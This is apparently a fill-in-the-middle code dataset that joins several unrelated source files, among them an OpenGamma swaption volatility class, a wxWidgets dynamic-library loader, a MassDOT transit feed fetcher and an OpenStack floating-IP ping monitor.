import com.opengamma.strata.product.swap.type.FixedIborSwapConvention; /** * Volatility for swaptions in the normal or Bachelier model based on a surface. * <p> * The volatility is represented by a surface on the expiry and strike dimensions. */ @BeanDefinition(builderScope = "private") public final class NormalSwaptionExpiryStrikeVolatilities implements NormalSwaptionVolatilities, ImmutableBean, Serializable { /** * The swap convention that the volatilities are to be used for. */ @PropertyDefinition(validate = "notNull", overrideGet = true) private final FixedFloatSwapConvention convention; /** * The valuation date-time. * <p> * The volatilities are calibrated for this date-time. */ @PropertyDefinition(validate = "notNull", overrideGet = true) private final ZonedDateTime valuationDateTime; /** * The normal volatility surface. * <p> * The x-value of the surface is the expiry, as a year fraction. * The y-value of the surface is the strike, as a rate. */ @PropertyDefinition(validate = "notNull") private final Surface surface; /** * The day count convention of the surface. */ private final transient DayCount dayCount; // cached, not a property //------------------------------------------------------------------------- /** * Obtains an instance from the implied volatility surface and the date-time for which it is valid. * <p> * The surface is specified by an instance of {@link Surface}, such as {@link InterpolatedNodalSurface}. * The surface must contain the correct metadata: * <ul> * <li>The x-value type must be {@link ValueType#YEAR_FRACTION} * <li>The y-value type must be {@link ValueType#STRIKE} * <li>The z-value type must be {@link ValueType#NORMAL_VOLATILITY} * <li>The day count must be set in the additional information using {@link SurfaceInfoType#DAY_COUNT} * </ul> * Suitable surface metadata can be created using * {@link Surfaces#normalVolatilityByExpiryStrike(String, DayCount)}. * * @param convention the swap convention that the volatilities are to be used for * @param valuationDateTime the valuation date-time * @param surface the implied volatility surface * @return the volatilities */ public static NormalSwaptionExpiryStrikeVolatilities of( FixedFloatSwapConvention convention, ZonedDateTime valuationDateTime, Surface surface) { return new NormalSwaptionExpiryStrikeVolatilities(convention, valuationDateTime, surface); } @ImmutableConstructor private NormalSwaptionExpiryStrikeVolatilities( FixedFloatSwapConvention convention, ZonedDateTime valuationDateTime, Surface surface) { ArgChecker.notNull(convention, "convention"); ArgChecker.notNull(valuationDateTime, "valuationDateTime"); ArgChecker.notNull(surface, "surface"); surface.getMetadata().getXValueType().checkEquals( ValueType.YEAR_FRACTION, "Incorrect x-value type for Normal volatilities"); surface.getMetadata().getYValueType().checkEquals( ValueType.STRIKE, "Incorrect y-value type for Normal volatilities"); surface.getMetadata().getZValueType().checkEquals( ValueType.NORMAL_VOLATILITY, "Incorrect z-value type for Normal volatilities"); DayCount dayCount = surface.getMetadata().findInfo(SurfaceInfoType.DAY_COUNT) .orElseThrow(() -> new IllegalArgumentException("Incorrect surface metadata, missing DayCount")); this.valuationDateTime = valuationDateTime; this.surface = surface; this.convention = convention; this.dayCount = dayCount; } // ensure standard constructor is invoked private Object readResolve() { return new NormalSwaptionExpiryStrikeVolatilities(convention, valuationDateTime, surface); } //------------------------------------------------------------------------- @Override public SwaptionVolatilitiesName getName() { return SwaptionVolatilitiesName.of(surface.getName().getName()); } @Override public <T> Optional<T> findData(MarketDataName<T> name) { if (surface.getName().equals(name)) { return Optional.of(name.getMarketDataType().cast(surface)); } return Optional.empty(); } @Override public int getParameterCount() { return surface.getParameterCount(); } @Override public double getParameter(int parameterIndex) { return surface.getParameter(parameterIndex); } @Override public ParameterMetadata getParameterMetadata(int parameterIndex) { return surface.getParameterMetadata(parameterIndex); } @Override public OptionalInt findParameterIndex(ParameterMetadata metadata) { return surface.findParameterIndex(metadata); } @Override public NormalSwaptionExpiryStrikeVolatilities withParameter(int parameterIndex, double newValue) { return new NormalSwaptionExpiryStrikeVolatilities( convention, valuationDateTime, surface.withParameter(parameterIndex, newValue)); } @Override public NormalSwaptionExpiryStrikeVolatilities withPerturbation(ParameterPerturbation perturbation) { return new NormalSwaptionExpiryStrikeVolatilities( convention, valuationDateTime, surface.withPerturbation(perturbation)); } //------------------------------------------------------------------------- @Override public double volatility(double expiry, double tenor, double strike, double forwardRate) { return surface.zValue(expiry, strike); } @Override public CurrencyParameterSensitivities parameterSensitivity(PointSensitivities pointSensitivities) { CurrencyParameterSensitivities sens = CurrencyParameterSensitivities.empty(); for (PointSensitivity point : pointSensitivities.getSensitivities()) { if (point instanceof SwaptionSensitivity) { SwaptionSensitivity pt = (SwaptionSensitivity) point; if (pt.getVolatilitiesName().equals(getName())) { sens = sens.combinedWith(parameterSensitivity(pt)); } } } return sens; } private CurrencyParameterSensitivity parameterSensitivity(SwaptionSensitivity point) { double expiry = point.getExpiry(); double strike = point.getStrike(); UnitParameterSensitivity unitSens = surface.zValueParameterSensitivity(expiry, strike); return unitSens.multipliedBy(point.getCurrency(), point.getSensitivity()); } //------------------------------------------------------------------------- @Override public double price(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) { return NormalFormulaRepository.price(forward, strike, expiry, volatility, putCall); } @Override public double priceDelta(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) { return NormalFormulaRepository.delta(forward, strike, expiry, volatility, putCall); } @Override public double priceGamma(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) { return NormalFormulaRepository.gamma(forward, strike, expiry, volatility, putCall); } @Override public double priceTheta(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) { return NormalFormulaRepository.theta(forward, strike, expiry, volatility, putCall); } @Override public double priceVega(double expiry, double tenor, PutCall putCall, double strike, double forward, double volatility) { return NormalFormulaRepository.vega(forward, strike, expiry, volatility, putCall); } //------------------------------------------------------------------------- @Override public double relativeTime(ZonedDateTime dateTime) { ArgChecker.notNull(dateTime, "dateTime"); LocalDate valuationDate = valuationDateTime.toLocalDate(); LocalDate date = dateTime.toLocalDate(); return dayCount.relativeYearFraction(valuationDate, date); } @Override public double tenor(LocalDate startDate, LocalDate endDate) { // rounded number of months. the rounding is to ensure that an integer number of year even with holidays/leap year return Math.round((endDate.toEpochDay() - startDate.toEpochDay()) / 365.25 * 12) / 12; } //------------------------- AUTOGENERATED START ------------------------- /** * The meta-bean for {@code NormalSwaptionExpiryStrikeVolatilities}. * @return the meta-bean, not null */ public static NormalSwaptionExpiryStrikeVolatilities.Meta meta() { return NormalSwaptionExpiryStrikeVolatilities.Meta.INSTANCE; } static { MetaBean.register(NormalSwaptionExpiryStrikeVolatilities.Meta.INSTANCE); } /** * The serialization version id. */ private static final long serialVersionUID = 1L; @Override public NormalSwaptionExpiryStrikeVolatilities.Meta metaBean() { return NormalSwaptionExpiryStrikeVolatilities.Meta.INSTANCE; } //----------------------------------------------------------------------- /** * Gets the swap convention that the volatilities are to be used for. * @return the value of the property, not null */ @Override public FixedFloatSwapConvention getConvention() { return convention; } //----------------------------------------------------------------------- /** * Gets the valuation date-time. * <p> * The volatilities are calibrated for this date-time. * @return the value of the property, not null */ @Override public ZonedDateTime getValuationDateTime() { return valuationDateTime; } //----------------------------------------------------------------------- /** * Gets the normal volatility surface. * <p> * The x-value of the surface is the expiry, as a year fraction. * The y-value of the surface is the strike, as a rate. * @return the value of the property, not null */ public Surface getSurface() { return surface; } <|fim▁hole|> if (obj == this) { return true; } if (obj != null && obj.getClass() == this.getClass()) { NormalSwaptionExpiryStrikeVolatilities other = (NormalSwaptionExpiryStrikeVolatilities) obj; return JodaBeanUtils.equal(convention, other.convention) && JodaBeanUtils.equal(valuationDateTime, other.valuationDateTime) && JodaBeanUtils.equal(surface, other.surface); } return false; } @Override public int hashCode() { int hash = getClass().hashCode(); hash = hash * 31 + JodaBeanUtils.hashCode(convention); hash = hash * 31 + JodaBeanUtils.hashCode(valuationDateTime); hash = hash * 31 + JodaBeanUtils.hashCode(surface); return hash; } @Override public String toString() { StringBuilder buf = new StringBuilder(128); buf.append("NormalSwaptionExpiryStrikeVolatilities{"); buf.append("convention").append('=').append(JodaBeanUtils.toString(convention)).append(',').append(' '); buf.append("valuationDateTime").append('=').append(JodaBeanUtils.toString(valuationDateTime)).append(',').append(' '); buf.append("surface").append('=').append(JodaBeanUtils.toString(surface)); buf.append('}'); return buf.toString(); } //----------------------------------------------------------------------- /** * The meta-bean for {@code NormalSwaptionExpiryStrikeVolatilities}. */ public static final class Meta extends DirectMetaBean { /** * The singleton instance of the meta-bean. */ static final Meta INSTANCE = new Meta(); /** * The meta-property for the {@code convention} property. */ private final MetaProperty<FixedFloatSwapConvention> convention = DirectMetaProperty.ofImmutable( this, "convention", NormalSwaptionExpiryStrikeVolatilities.class, FixedFloatSwapConvention.class); /** * The meta-property for the {@code valuationDateTime} property. */ private final MetaProperty<ZonedDateTime> valuationDateTime = DirectMetaProperty.ofImmutable( this, "valuationDateTime", NormalSwaptionExpiryStrikeVolatilities.class, ZonedDateTime.class); /** * The meta-property for the {@code surface} property. */ private final MetaProperty<Surface> surface = DirectMetaProperty.ofImmutable( this, "surface", NormalSwaptionExpiryStrikeVolatilities.class, Surface.class); /** * The meta-properties. */ private final Map<String, MetaProperty<?>> metaPropertyMap$ = new DirectMetaPropertyMap( this, null, "convention", "valuationDateTime", "surface"); /** * Restricted constructor. */ private Meta() { } @Override protected MetaProperty<?> metaPropertyGet(String propertyName) { switch (propertyName.hashCode()) { case 2039569265: // convention return convention; case -949589828: // valuationDateTime return valuationDateTime; case -1853231955: // surface return surface; } return super.metaPropertyGet(propertyName); } @Override public BeanBuilder<? extends NormalSwaptionExpiryStrikeVolatilities> builder() { return new NormalSwaptionExpiryStrikeVolatilities.Builder(); } @Override public Class<? extends NormalSwaptionExpiryStrikeVolatilities> beanType() { return NormalSwaptionExpiryStrikeVolatilities.class; } @Override public Map<String, MetaProperty<?>> metaPropertyMap() { return metaPropertyMap$; } //----------------------------------------------------------------------- /** * The meta-property for the {@code convention} property. * @return the meta-property, not null */ public MetaProperty<FixedFloatSwapConvention> convention() { return convention; } /** * The meta-property for the {@code valuationDateTime} property. * @return the meta-property, not null */ public MetaProperty<ZonedDateTime> valuationDateTime() { return valuationDateTime; } /** * The meta-property for the {@code surface} property. * @return the meta-property, not null */ public MetaProperty<Surface> surface() { return surface; } //----------------------------------------------------------------------- @Override protected Object propertyGet(Bean bean, String propertyName, boolean quiet) { switch (propertyName.hashCode()) { case 2039569265: // convention return ((NormalSwaptionExpiryStrikeVolatilities) bean).getConvention(); case -949589828: // valuationDateTime return ((NormalSwaptionExpiryStrikeVolatilities) bean).getValuationDateTime(); case -1853231955: // surface return ((NormalSwaptionExpiryStrikeVolatilities) bean).getSurface(); } return super.propertyGet(bean, propertyName, quiet); } @Override protected void propertySet(Bean bean, String propertyName, Object newValue, boolean quiet) { metaProperty(propertyName); if (quiet) { return; } throw new UnsupportedOperationException("Property cannot be written: " + propertyName); } } //----------------------------------------------------------------------- /** * The bean-builder for {@code NormalSwaptionExpiryStrikeVolatilities}. */ private static final class Builder extends DirectPrivateBeanBuilder<NormalSwaptionExpiryStrikeVolatilities> { private FixedFloatSwapConvention convention; private ZonedDateTime valuationDateTime; private Surface surface; /** * Restricted constructor. */ private Builder() { } //----------------------------------------------------------------------- @Override public Object get(String propertyName) { switch (propertyName.hashCode()) { case 2039569265: // convention return convention; case -949589828: // valuationDateTime return valuationDateTime; case -1853231955: // surface return surface; default: throw new NoSuchElementException("Unknown property: " + propertyName); } } @Override public Builder set(String propertyName, Object newValue) { switch (propertyName.hashCode()) { case 2039569265: // convention this.convention = (FixedFloatSwapConvention) newValue; break; case -949589828: // valuationDateTime this.valuationDateTime = (ZonedDateTime) newValue; break; case -1853231955: // surface this.surface = (Surface) newValue; break; default: throw new NoSuchElementException("Unknown property: " + propertyName); } return this; } @Override public NormalSwaptionExpiryStrikeVolatilities build() { return new NormalSwaptionExpiryStrikeVolatilities( convention, valuationDateTime, surface); } //----------------------------------------------------------------------- @Override public String toString() { StringBuilder buf = new StringBuilder(128); buf.append("NormalSwaptionExpiryStrikeVolatilities.Builder{"); buf.append("convention").append('=').append(JodaBeanUtils.toString(convention)).append(',').append(' '); buf.append("valuationDateTime").append('=').append(JodaBeanUtils.toString(valuationDateTime)).append(',').append(' '); buf.append("surface").append('=').append(JodaBeanUtils.toString(surface)); buf.append('}'); return buf.toString(); } } //-------------------------- AUTOGENERATED END -------------------------- }<|fim▁end|>
//----------------------------------------------------------------------- @Override public boolean equals(Object obj) {
<|file_name|>encoding.py<|end_file_name|><|fim▁begin|>import datetime from decimal import Decimal import types import six def is_protected_type(obj): """Determine if the object instance is of a protected type. Objects of protected types are preserved as-is when passed to force_unicode(strings_only=True). """ return isinstance(obj, ( six.integer_types + (types.NoneType, datetime.datetime, datetime.date, datetime.time, float, Decimal)) ) def force_unicode(s, encoding='utf-8', strings_only=False, errors='strict'): """ Similar to smart_text, except that lazy instances are resolved to strings, rather than kept as lazy objects. If strings_only is True, don't convert (some) non-string-like objects. """ # Handle the common case first, saves 30-40% when s is an instance of # six.text_type. This function gets called often in that setting. if isinstance(s, six.text_type):<|fim▁hole|> return s if strings_only and is_protected_type(s): return s try: if not isinstance(s, six.string_types): if hasattr(s, '__unicode__'): s = s.__unicode__() else: if six.PY3: if isinstance(s, bytes): s = six.text_type(s, encoding, errors) else: s = six.text_type(s) else: s = six.text_type(bytes(s), encoding, errors) else: # Note: We use .decode() here, instead of six.text_type(s, # encoding, errors), so that if s is a SafeBytes, it ends up being # a SafeText at the end. s = s.decode(encoding, errors) except UnicodeDecodeError as e: if not isinstance(s, Exception): raise UnicodeDecodeError(*e.args) else: # If we get to here, the caller has passed in an Exception # subclass populated with non-ASCII bytestring data without a # working unicode method. Try to handle this without raising a # further exception by individually forcing the exception args # to unicode. s = ' '.join([force_unicode(arg, encoding, strings_only, errors) for arg in s]) return s<|fim▁end|>
<|file_name|>Massdot.py<|end_file_name|><|fim▁begin|>"""Fetch Massacheusetts Department of Transportation feeds. MassDOT supplies the feeds for MA not covered by MBTA (Boston's transit authority). http://www.massdot.state.ma.us/DevelopersData.aspx """ import logging from FeedSource import FeedSource BASE_URL = 'http://www.massdot.state.ma.us/Portals/0/docs/developers/' LOG = logging.getLogger(__name__) class Massdot(FeedSource): """Fetch MassDOT (MA, non-Boston) feeds.""" def __init__(self): super(Massdot, self).__init__() berkshire_url = '%sbrta_google_transit.zip' % BASE_URL brockton_url = '%sbat_google_transit.zip' % BASE_URL cape_ann_url = '%scata_google_transit.zip' % BASE_URL cape_cod_url = '%sccrta_google_transit.zip' % BASE_URL franklin_url = '%sfrta_google_transit.zip' % BASE_URL attleboro_url = '%sgatra_google_transit.zip' % BASE_URL lowell_url = '%slrta_google_transit.zip' % BASE_URL merrimack_url = '%smvrta_google_transit.zip' % BASE_URL metrowest_url = '%smwrta_google_transit.zip' % BASE_URL montachusett_url = '%smart_google_transit.zip' % BASE_URL nantucket_url = '%snrta_google_transit.zip' % BASE_URL pioneer_valley_url = 'http://www.pvta.com/g_trans/google_transit.zip' southeastern_url = '%ssrta_google_transit.zip' % BASE_URL vineyard_url = '%svta_google_transit.zip' % BASE_URL worchester_url = '%swrta_google_transit.zip' % BASE_URL ma_ferry_url = '%sferries_google_transit.zip' % BASE_URL # private bus services; these feeds tend to have validation issues bloom_url = '%sBloom_google_transit.zip' % BASE_URL boston_express_url = '%sboston_express_google_transit.zip' % BASE_URL coach_bus_url = '%scoach_google_transit.zip' % BASE_URL dattco_url = '%sdattco_google_transit.zip' % BASE_URL<|fim▁hole|> self.urls = { 'berkshire.zip': berkshire_url, 'brockton.zip': brockton_url, 'cape_ann.zip': cape_ann_url, 'cape_cod.zip': cape_cod_url, 'franklin.zip': franklin_url, 'attleboro.zip': attleboro_url, 'lowell.zip': lowell_url, 'merrimack.zip': merrimack_url, 'metrowest.zip': metrowest_url, 'montachusett.zip': montachusett_url, 'nantucket.zip': nantucket_url, 'pioneer_valley.zip': pioneer_valley_url, 'southeastern_ma.zip': southeastern_url, 'vineyard_ma.zip': vineyard_url, 'worchester.zip': worchester_url, 'ma_ferries.zip': ma_ferry_url, 'bloom_ma.zip': bloom_url, 'boston_express.zip': boston_express_url, 'coach_bus_ma.zip': coach_bus_url, 'dattco_ma.zip': dattco_url, 'peter_pan_ma.zip': peter_pan_url, 'plymouth_brockton_rail.zip': plymouth_brockton_railway_url, 'yankee_ma.zip': yankee_url }<|fim▁end|>
peter_pan_url = '%speter_pan_google_transit.zip' % BASE_URL plymouth_brockton_railway_url = '%sPB_google_transit.zip' % BASE_URL yankee_url = '%syankee_google_transit.zip' % BASE_URL
<|file_name|>common.rs<|end_file_name|><|fim▁begin|>use std::ffi::CString; use std::os::raw::c_char; #[macro_export] macro_rules! take_until_and_consume ( ( $i:expr, $needle:expr ) => ( { let input: &[u8] = $i; let (rem, res) = ::nom::take_until!(input, $needle)?; let (rem, _) = ::nom::take!(rem, $needle.len())?; Ok((rem, res)) } ); ); #[cfg(not(feature = "debug-validate"))] #[macro_export] macro_rules! debug_validate_bug_on ( ($item:expr) => {}; ); #[cfg(feature = "debug-validate")] #[macro_export] macro_rules! debug_validate_bug_on ( ($item:expr) => { if $item { panic!("Condition check failed"); } }; ); #[cfg(not(feature = "debug-validate"))] #[macro_export] macro_rules! debug_validate_fail ( ($msg:expr) => {}; ); #[cfg(feature = "debug-validate")] #[macro_export] macro_rules! debug_validate_fail ( ($msg:expr) => { // Wrap in a conditional to prevent unreachable code warning in caller. if true { panic!($msg); } }; ); /// Convert a String to C-compatible string /// /// This function will consume the provided data and use the underlying bytes to construct a new /// string, ensuring that there is a trailing 0 byte. This trailing 0 byte will be appended by this /// function; the provided data should *not* contain any 0 bytes in it. /// /// Returns a valid pointer, or NULL pub fn rust_string_to_c(s: String) -> *mut c_char { CString::new(s) .map(|c_str| c_str.into_raw()) .unwrap_or(std::ptr::null_mut()) } /// Free a CString allocated by Rust (for ex. using `rust_string_to_c`)<|fim▁hole|>/// s must be allocated by rust, using `CString::new` #[no_mangle] pub unsafe extern "C" fn rs_cstring_free(s: *mut c_char) { if s.is_null() { return; } drop(CString::from_raw(s)); }<|fim▁end|>
/// /// # Safety ///
<|file_name|>dynlib.cpp<|end_file_name|><|fim▁begin|>///////////////////////////////////////////////////////////////////////////// // Name: src/common/dynlib.cpp // Purpose: Dynamic library management // Author: Guilhem Lavaux // Modified by: // Created: 20/07/98 // Copyright: (c) 1998 Guilhem Lavaux // 2000-2005 Vadim Zeitlin // Licence: wxWindows licence ///////////////////////////////////////////////////////////////////////////// //FIXME: This class isn't really common at all, it should be moved into // platform dependent files (already done for Windows and Unix) // ============================================================================ // declarations // ============================================================================ // ---------------------------------------------------------------------------- // headers // ---------------------------------------------------------------------------- #include "wx/wxprec.h" #if wxUSE_DYNLIB_CLASS #include "wx/dynlib.h" #ifndef WX_PRECOMP #include "wx/intl.h" #include "wx/log.h" #include "wx/app.h" #include "wx/utils.h" #endif //WX_PRECOMP #include "wx/filefn.h" #include "wx/filename.h" // for SplitPath() #include "wx/platinfo.h" #include "wx/arrimpl.cpp" WX_DEFINE_USER_EXPORTED_OBJARRAY(wxDynamicLibraryDetailsArray) // ============================================================================ // implementation // ============================================================================ // --------------------------------------------------------------------------- // wxDynamicLibrary // --------------------------------------------------------------------------- // for MSW/Unix it is defined in platform-specific file #if !(defined(__WINDOWS__) || defined(__UNIX__)) wxDllType wxDynamicLibrary::GetProgramHandle() { wxFAIL_MSG( wxT("GetProgramHandle() is not implemented under this platform")); return 0; } #endif // __WINDOWS__ || __UNIX__ bool wxDynamicLibrary::Load(const wxString& libnameOrig, int flags) { wxASSERT_MSG(m_handle == 0, wxT("Library already loaded.")); // add the proper extension for the DLL ourselves unless told not to wxString libname = libnameOrig; if ( !(flags & wxDL_VERBATIM) ) { // and also check that the libname doesn't already have it wxString ext; wxFileName::SplitPath(libname, NULL, NULL, &ext); if ( ext.empty() ) { libname += GetDllExt(wxDL_MODULE); } } m_handle = RawLoad(libname, flags); if ( m_handle == 0 && !(flags & wxDL_QUIET) ) { ReportError(_("Failed to load shared library '%s'"), libname); } return IsLoaded(); } void *wxDynamicLibrary::DoGetSymbol(const wxString &name, bool *success) const { wxCHECK_MSG( IsLoaded(), NULL, wxT("Can't load symbol from unloaded library") ); void *symbol = RawGetSymbol(m_handle, name); if ( success ) *success = symbol != NULL; return symbol; } void *wxDynamicLibrary::GetSymbol(const wxString& name, bool *success) const { void *symbol = DoGetSymbol(name, success); if ( !symbol ) { ReportError(_("Couldn't find symbol '%s' in a dynamic library"), name); } return symbol; } // ---------------------------------------------------------------------------- // informational methods // ---------------------------------------------------------------------------- /*static*/ wxString wxDynamicLibrary::GetDllExt(wxDynamicLibraryCategory cat) { wxUnusedVar(cat); #if defined(__WINDOWS__) return ".dll"; #elif defined(__HPUX__) return ".sl"; #elif defined(__DARWIN__) switch ( cat ) { case wxDL_LIBRARY: return ".dylib"; case wxDL_MODULE: return ".bundle"; } wxFAIL_MSG("unreachable"); return wxString(); // silence gcc warning #else return ".so"; #endif } /*static*/ wxString wxDynamicLibrary::CanonicalizeName(const wxString& name, wxDynamicLibraryCategory cat) { wxString nameCanonic; <|fim▁hole|> { case wxDL_LIBRARY: // Library names should start with "lib" under Unix. nameCanonic = "lib"; break; case wxDL_MODULE: // Module names are arbitrary and should have no prefix added. break; } #endif nameCanonic << name << GetDllExt(cat); return nameCanonic; } /*static*/ wxString wxDynamicLibrary::CanonicalizePluginName(const wxString& name, wxPluginCategory cat) { wxString suffix; if ( cat == wxDL_PLUGIN_GUI ) { suffix = wxPlatformInfo::Get().GetPortIdShortName(); } #if wxUSE_UNICODE suffix << wxT('u'); #endif #ifdef __WXDEBUG__ suffix << wxT('d'); #endif if ( !suffix.empty() ) suffix = wxString(wxT("_")) + suffix; #define WXSTRINGIZE(x) #x #if defined(__UNIX__) #if (wxMINOR_VERSION % 2) == 0 #define wxDLLVER(x,y,z) "-" WXSTRINGIZE(x) "." WXSTRINGIZE(y) #else #define wxDLLVER(x,y,z) "-" WXSTRINGIZE(x) "." WXSTRINGIZE(y) "." WXSTRINGIZE(z) #endif #else #if (wxMINOR_VERSION % 2) == 0 #define wxDLLVER(x,y,z) WXSTRINGIZE(x) WXSTRINGIZE(y) #else #define wxDLLVER(x,y,z) WXSTRINGIZE(x) WXSTRINGIZE(y) WXSTRINGIZE(z) #endif #endif suffix << wxString::FromAscii(wxDLLVER(wxMAJOR_VERSION, wxMINOR_VERSION, wxRELEASE_NUMBER)); #undef wxDLLVER #undef WXSTRINGIZE #ifdef __WINDOWS__ // Add compiler identification: #if defined(__GNUG__) suffix << wxT("_gcc"); #elif defined(__VISUALC__) suffix << wxT("_vc"); #endif #endif return CanonicalizeName(name + suffix, wxDL_MODULE); } /*static*/ wxString wxDynamicLibrary::GetPluginsDirectory() { #ifdef __UNIX__ wxString format = wxGetInstallPrefix(); if ( format.empty() ) return wxEmptyString; wxString dir; format << wxFILE_SEP_PATH << wxT("lib") << wxFILE_SEP_PATH << wxT("wx") << wxFILE_SEP_PATH #if (wxMINOR_VERSION % 2) == 0 << wxT("%i.%i"); dir.Printf(format.c_str(), wxMAJOR_VERSION, wxMINOR_VERSION); #else << wxT("%i.%i.%i"); dir.Printf(format.c_str(), wxMAJOR_VERSION, wxMINOR_VERSION, wxRELEASE_NUMBER); #endif return dir; #else // ! __UNIX__ return wxEmptyString; #endif } #endif // wxUSE_DYNLIB_CLASS<|fim▁end|>
// under Unix the library names usually start with "lib" prefix, add it #if defined(__UNIX__) switch ( cat )
<|file_name|>authcodes.js<|end_file_name|><|fim▁begin|>module.exports = function(app) { var _env = app.get('env'); var _log = app.lib.logger; var _mongoose = app.core.mongo.mongoose; var _group = 'MODEL:oauth.authcodes'; var Schema = { authCode : {type: String, required: true, unique: true, alias: 'authCode'}, clientId : {type: String, alias: 'clientId'}, userId : {type: String, required: true, alias: 'userId'}, expires : {type: Date, alias: 'expires'} }; var AuthCodesSchema = app.core.mongo.db.Schema(Schema);<|fim▁hole|> // statics AuthCodesSchema.method('getAuthCode', function(authCode, cb) { var AuthCodes = _mongoose.model('Oauth_AuthCodes'); AuthCodes.findOne({authCode: authCode}, cb); }); AuthCodesSchema.method('saveAuthCode', function(code, clientId, expires, userId, cb) { var AuthCodes = _mongoose.model('Oauth_AuthCodes'); if (userId.id) userId = userId.id; var fields = { clientId : clientId, userId : userId, expires : expires }; AuthCodes.update({authCode: code}, fields, {upsert: true}, function(err) { if (err) _log.error(_group, err); cb(err); }); }); return _mongoose.model('Oauth_AuthCodes', AuthCodesSchema); };<|fim▁end|>
<|file_name|>index.js<|end_file_name|><|fim▁begin|>describe("BASIC CRUD SCENARIOS", function() { require("./basic"); }); describe("VALIDATE CRUD SCENARIOS", function() { require("./validation"); }); describe("REPORT SCENARIOS", function() { require("./report");<|fim▁hole|><|fim▁end|>
});
<|file_name|>ping_working_public.py<|end_file_name|><|fim▁begin|>#! /usr/bin/python # @author: wtie import subprocess import sys import time import argparse DIFF = False FIRST = [] def get_floating_ips(): sql = """SELECT fip.floating_ip_address FROM neutron.floatingips AS fip JOIN neutron.ports AS p JOIN neutron.securitygroupportbindings AS sgb JOIN neutron.securitygrouprules AS sgr JOIN ( SELECT ins.uuid , Count(p.id) AS count FROM nova.instances AS ins JOIN neutron.ports AS p where ins.uuid=p.device_id AND ins.deleted=0 AND ins.vm_state='active' AND ins.task_state IS NULL GROUP BY ins.uuid ) AS i WHERE fip.fixed_port_id=p.id AND p.admin_state_up=1 AND sgb.port_id=p.id AND sgb.security_group_id=sgr.security_group_id AND sgr.direction='ingress' AND sgr.protocol='icmp' AND sgr.remote_ip_prefix='0.0.0.0/0' AND p.device_id=i.uuid AND i.count=1;""" floating_ips = [ip for ip in subprocess.Popen( ["mysql", "-sNe", sql], stdout=subprocess.PIPE).communicate()[0].split("\n") if ip] return floating_ips def get_public_ips(net_uuid): if not net_uuid: return None sql = """SELECT ipa.ip_address<|fim▁hole|>JOIN ( SELECT ins.uuid , Count(p.id) AS count FROM nova.instances AS ins JOIN neutron.ports AS p where ins.uuid=p.device_id AND ins.deleted=0 AND ins.vm_state='active' AND ins.task_state IS NULL GROUP BY ins.uuid ) AS i WHERE ipa.network_id='""" + net_uuid + """' AND ipa.port_id=p.id AND p.admin_state_up=1 AND p.device_owner LIKE "compute:%" AND sgb.port_id=p.id AND sgb.security_group_id=sgr.security_group_id AND sgr.direction='ingress' AND sgr.protocol='icmp' AND sgr.remote_ip_prefix='0.0.0.0/0' AND p.device_id=i.uuid AND i.count=1;""" public_ips = [ip for ip in subprocess.Popen( ["mysql", "-sNe", sql], stdout=subprocess.PIPE).communicate()[0].split("\n") if ip] return public_ips def ping(ip): return subprocess.call(["ping", "-c", "1", "-w", "1", ip], stdout=subprocess.PIPE, stderr=subprocess.PIPE) def ping_loop(net_uuid=None): pingable_ips = get_public_ips(net_uuid) if net_uuid else [] pingable_ips += get_floating_ips() total = len(pingable_ips) fail_list = [] global DIFF global FIRST for ip in pingable_ips: if DIFF and FIRST and ip in FIRST: result = "?" else: result = ping(ip) sys.stdout.write(str(result)) sys.stdout.flush() if result == 1: fail_list.append(ip) #simple way to remove duplicate ips, need to improve fail_list = list(set(fail_list)) if DIFF: if FIRST: diff_list = [ip for ip in fail_list if ip not in FIRST] print "\n@DIFF: [%s] %s/%s: %s" % (total, len(diff_list), len(fail_list), diff_list) else: FIRST = fail_list print "\nFIRST: [%s] %s/%s: %s" % (total, len(fail_list), len(fail_list), fail_list) else: print "\n[%s] %s: %s" % (total, len(fail_list), fail_list) return fail_list def print_report(failed_map, least_interval): report = {} for ip in failed_map: if failed_map[ip] == 1: pass if failed_map[ip] in report: report[failed_map[ip]].append(ip) else: report[failed_map[ip]] = [ip] print "REPORT:\n" for count in report: outage = least_interval * (count - 1) print("~%s :\n %s\n" % (outage, report[count])) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--net_id", help="Include netwrok <net-id>") parser.add_argument("--diff", action="store_true", help="Only print diff ips compare with first round", default=False) args = parser.parse_args() public_network_uuid = args.net_id if args.net_id else None least_interval = 10 if args.diff: DIFF = True while True: try: start = time.time() print time.strftime("%x %X") failed_map = {} fail_list = ping_loop(public_network_uuid) for ip in fail_list: if ip in failed_map: failed_map[ip] += 1 else: failed_map[ip] = 1 end = time.time() if (end-start) < least_interval: time.sleep(least_interval - (end-start)) except KeyboardInterrupt: print_report(failed_map,least_interval) sys.exit(0)<|fim▁end|>
FROM neutron.ports AS p JOIN neutron.ipallocations AS ipa JOIN neutron.securitygroupportbindings AS sgb JOIN neutron.securitygrouprules AS sgr
<|file_name|>factories.py<|end_file_name|><|fim▁begin|>import factory from dominion.games.models import Game <|fim▁hole|> class Meta: model = Game<|fim▁end|>
class GameFactory(factory.django.DjangoModelFactory):
<|file_name|>contacts.interface.ts<|end_file_name|><|fim▁begin|>export interface IContact { id?: number; email: string;<|fim▁hole|><|fim▁end|>
listName: string; name: string; }
<|file_name|>inspector.py<|end_file_name|><|fim▁begin|>import sys from arrowhead.core import Step from arrowhead.core import ErrorArrow from arrowhead.core import NormalArrow from arrowhead.core import ValueArrow def print_flow_state(flow, active_step_name=None, file=sys.stdout): """ Display the state of a given flow.<|fim▁hole|> (optional) name of the active step :param file: (optional) file to print to (defaults to sys.stdout) This function actually prints() a developer-friendly version of the state of the entire flow. The output is composed of many lines. The output will contain all of the internal state of the flow (may print stuff like passwords if you stored any). """ # show flow name print("[{}]".format(flow.Meta.name).center(40, "~"), file=file) # show flow global state needs_header = True for f_k, f_v in flow.__dict__.items(): # private stuff is private if f_k.startswith("_"): continue # steps are handled later if (isinstance(f_v, Step) or (isinstance(f_v, type) and issubclass(f_v, Step))): continue # skip Meta if f_k == 'Meta': continue if needs_header: print("STATE:", file=file) needs_header = False print("{indent}{key}: {value!r}".format( indent=" " * 4, key=f_k, value=f_v ), file=file) # show a list of all the steps, their state as well as a marker that # shows where we actively are print("STEPS:", file=file) for name in flow.Meta.steps.keys(): step = getattr(flow, name) flags = [] if step.Meta.accepting: flags.append('A') if step.Meta.initial == name: flags.append('I') if flags: rendered_flags = " ({})".format(''.join(flags)) else: rendered_flags = "" 